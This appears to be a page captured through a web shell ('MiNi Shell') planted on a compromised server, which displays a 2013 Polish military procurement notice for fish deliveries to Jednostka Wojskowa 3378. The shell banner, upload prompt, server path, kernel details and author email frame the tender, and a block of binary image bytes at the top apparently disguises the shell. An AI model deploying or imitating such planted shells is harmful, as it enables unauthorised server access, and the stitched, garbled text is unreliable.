JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131002/202059-N-2013.html

<p class="kh_header"><b>Oleszno: DOSTAWA RYB REALIZOWANA DO 
JEDNOSTKI WOJSKOWEJ 3378 DRAWSKO POMORSKIE

Znak postępowania 754/2013</b><br>
<b>Numer ogłoszenia: 202059 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3378 Drawsko Pomorskie , ul. Główna 1, 78-513 Oleszno, woj. zachodniopomorskie, tel. 94 7474572, faks 94 7474571, 7474605.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.16wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: MON JEDNOSTKA WOJSKOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA RYB REALIZOWANA DO 
JEDNOSTKI WOJSKOWEJ 3378 DRAWSKO POMORSKIE

Znak postępowania 754/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa ryb realizowana do Jednostki Wojskowej 3378
2.Oznaczenie wg Wspólnego Słownika Zamówień:
Kod CPV  03142500-3
3. Zamawiający podzielił przedmiot zamówienia na cztery zadania i dopuszcza składanie ofert częściowych 
4.Wykonawca dostarczy przedmiot zamówienia do odbiorców wyszczególnionych w poszczególnych zadaniach, na poniżej podane adresy zgodnie z opisem przedmiotu zamówienia załącznik nr 1 do SIWZ i złożoną ofertą:
ZADANIE  I, 
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1 
78-513 Oleszno
Telefon do magazynu żywnościowego : 947474087
Telefon do kancelarii żywnościowej: 947474217
ZADANIE II, 
Miejsce dostaw:
1)	Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków  4
78-524 Złocieniec
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 943637540
2)	Magazyn żywnościowy Przedszkola nr 37
Ul. Pancerniaków 5  78-524 Złocieniec
Telefon do magazynu przedszkola 943637389
ZADANIE III,
Miejsce dostaw:
Magazyn żywnościowy JW. 3378 przy JW 4094
Ul. Kościuszki 24 
78-600 Wałcz
Telefon do magazynu żywnościowego : 672502085
Telefon do kancelarii żywnościowej: 672502080
ZADANIE IV
Miejsce dostaw:
1)	Magazyn żywnościowy JW 3378 przy JW 3299
78-651 Mirosławiec Górny
Telefon do kancelarii żywnościowej: 672505788 
2)	Magazyn żywnościowy Przedszkola nr 137
Ul. Osiedle XXX-lecia LLP   78-651 Mirosławiec
Telefon do magazynu przedszkola 672505702 
3. Opis poszczególnych części zamówienia: 
ZADANIE I Oleszno		
Lp.	Nazwa produktu	Jm	Ilość
1.	Pstrąg  filet	kg	200
2.	Łosoś  filet	kg	200
3.	Sandacz filet mrożony	kg	200
4.	Dorsz mrożony filet	kg	2 000
5.	Morszczuk mrożony filet	kg	2 000
6.	Mintaj mrożony filet	kg	2 000
7.	Śledzie solone matjasy filety	kg	1 200
8.	Pstrąg wędzony patroszony	kg	500
9.	Łosoś wędzony filet	kg	500
10.	Makrela wędzona tusza	kg	800
11.	Śledź marynowany	kg	800
12.	Śledź po kaszubsku	kg	800
ZADANIE II Złocieniec		
1.	Karp świeży tusza	kg	80
2.	Pstrąg  filet	kg	150
3.	Łosoś  filet	kg	20
4.	Sandacz filet mrożony	kg	20
5.	Dorsz mrożony filet	kg	400
6.	Morszczuk mrożony filet	kg	200
7.	Mintaj mrożony filet	kg	200
8.	Śledzie solone matjasy filety	kg	100
9.	Pstrąg wędzony patroszony	kg	50
10.	Łosoś wędzony filet	kg	50
11.	Makrela wędzona tusza	kg	250
12.	Śledź marynowany	kg	250
13.	Śledź po kaszubsku	kg	350
Złocieniec - Przedszkole		
1.	Dorsz mrożony filet	kg	75
ZADANIE III Wałcz		
1.	Karp świeży tusza	kg	10
2.	Pstrąg  filet	kg	20
3.	Łosoś  filet	kg	20
4.	Sandacz filet mrożony	kg	20
5.	Dorsz mrożony filet	kg	350
6.	Morszczuk mrożony filet	kg	300
7.	Mintaj mrożony filet	kg	300
8.	Śledzie solone matjasy filety	kg	300
9.	Pstrąg wędzony patroszony	kg	100
10.	Łosoś wędzony filet	kg	100
11.	Makrela wędzona tusza	kg	200
12.	Śledź marynowany	kg	200
13.	Śledź po kaszubsku	kg	50
ZADANIE IV Mirosławiec- Nadarzyce	
1.	Karp świeży tusza	kg	10
2.	Pstrąg  filet	kg	50
3.	Łosoś  filet	kg	50
4.	Sandacz filet mrożony	kg	50
5.	Dorsz mrożony filet	kg	465
6.	Morszczuk mrożony filet	kg	400
7.	Mintaj mrożony filet	kg	400
8.	Śledzie solone matjasy filety	kg	400
9.	Pstrąg wędzony patroszony	kg	100
10.	Łosoś wędzony filet	kg	100
11.	Makrela wędzona tusza	kg	400
12.	Śledź marynowany	kg	400
13.	Śledź po kaszubsku	kg	400
Mirosławiec -Przedszkole		
1.	Dorsz mrożony filet	kg	35.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.24.00.00-2, 15.24.12.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium na cały przedmiot zamówienia w wysokości: 10032,02zł
Zamawiający żąda od Wykonawców wniesienia wadium na poszczególne zadania w kwotach:
- w zakresie zadania 1 -  6089,24 zł. brutto
- w zakresie zadania 2 -  1206,21 zł. brutto
- w zakresie zadania 3 -  1049,12 zł  brutto 
- w zakresie zadania 4 -  1687,45 zł. brutto</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków Wykonawca musi złożyć stosowne oświadczenia i dokumenty wyszczególnione w rozdziale VII SIWZ. 
Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki. 
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków Wykonawca musi złożyć stosowne oświadczenia i dokumenty wyszczególnione w rozdziale VII SIWZ. 
Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki. 
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków Wykonawca musi złożyć stosowne oświadczenia i dokumenty wyszczególnione w rozdziale VII SIWZ. 
Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki. 
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków Wykonawca musi złożyć stosowne oświadczenia i dokumenty wyszczególnione w rozdziale VII SIWZ. 
Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki. 
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków Wykonawca musi złożyć stosowne oświadczenia i dokumenty wyszczególnione w rozdziale VII SIWZ. 
Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki. 
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych w rozdziale VII SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">obowiązującej decyzji administracyjnej właściwego powiatowego lekarza weterynarii 
wydanej zgodnie z art. 20 ust. 1 pkt 2 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 ze zm.) 
lub
obowiązującej decyzji  administracyjnej właściwego Państwowego Powiatowego    Inspektora Sanitarnego w sprawie zatwierdzenia, warunkowego zatwierdzenia, przedłużenia warunkowego zatwierdzenia zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust.1 pkt 2 ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2010,  Nr 136 , poz. 914 ze zm.),
lub
zaświadczenia o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia   z dnia  29 maja 2007 r., w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów  produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli  Państwowej Inspekcji Sanitarnej (Dz. U. z  2007 r. Nr 106, poz. 730) 
W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego zamawiający żąda potwierdzenia wdrożonego systemu HACCP 
w jednej z następujących form: 
a)	certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju 
lub
b)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010,  Nr 136 , poz. 914 ze zm.),</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium.
Oświadczenie o posiadaniu polisy ubezpieczeniowej (załącznik nr 8 do SIWZ)
Formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.16wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 3378
Drawsko Pomorskie
ul. Główna 1
78-513 Oleszno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2013 godzina 10:30, miejsce: Jednostka Wojskowa 3378 Drawsko Pomorskie
ul. Główna 1,
78-513 Oleszno  (budynek  Nr 42 kancelaria Nr 108).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  I, 
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1 
78-513 Oleszno
Telefon do magazynu żywnościowego : 947474087
Telefon do kancelarii żywnościowej: 947474217.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.23.20.00-3, 15.24.00.00-2, 15.24.12.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II Złocieniec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków  4
78-524 Złocieniec
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 943637540
Magazyn żywnościowy Przedszkola nr 37
Ul. Pancerniaków 5  78-524 Złocieniec
Telefon do magazynu przedszkola 943637389.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.23.20.00-3, 15.24.00.00-2, 15.24.12.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE III Wałcz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Magazyn żywnościowy JW. 3378 przy JW 4094
Ul. Kościuszki 24 
78-600 Wałcz
Telefon do magazynu żywnościowego : 672502085
Telefon do kancelarii żywnościowej: 672502080.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.23.20.00-3, 15.24.00.00-2, 15.24.12.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE IV Mirosławiec- Nadarzyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Magazyn żywnościowy JW 3378 przy JW 3299
78-651 Mirosławiec Górny
Telefon do kancelarii żywnościowej: 672505788 
Magazyn żywnościowy Przedszkola nr 137
Ul. Osiedle XXX-lecia LLP   78-651 Mirosławiec
Telefon do magazynu przedszkola 672505702.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.40.00-7, 15.23.20.00-3, 15.24.00.00-2, 15.24.12.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com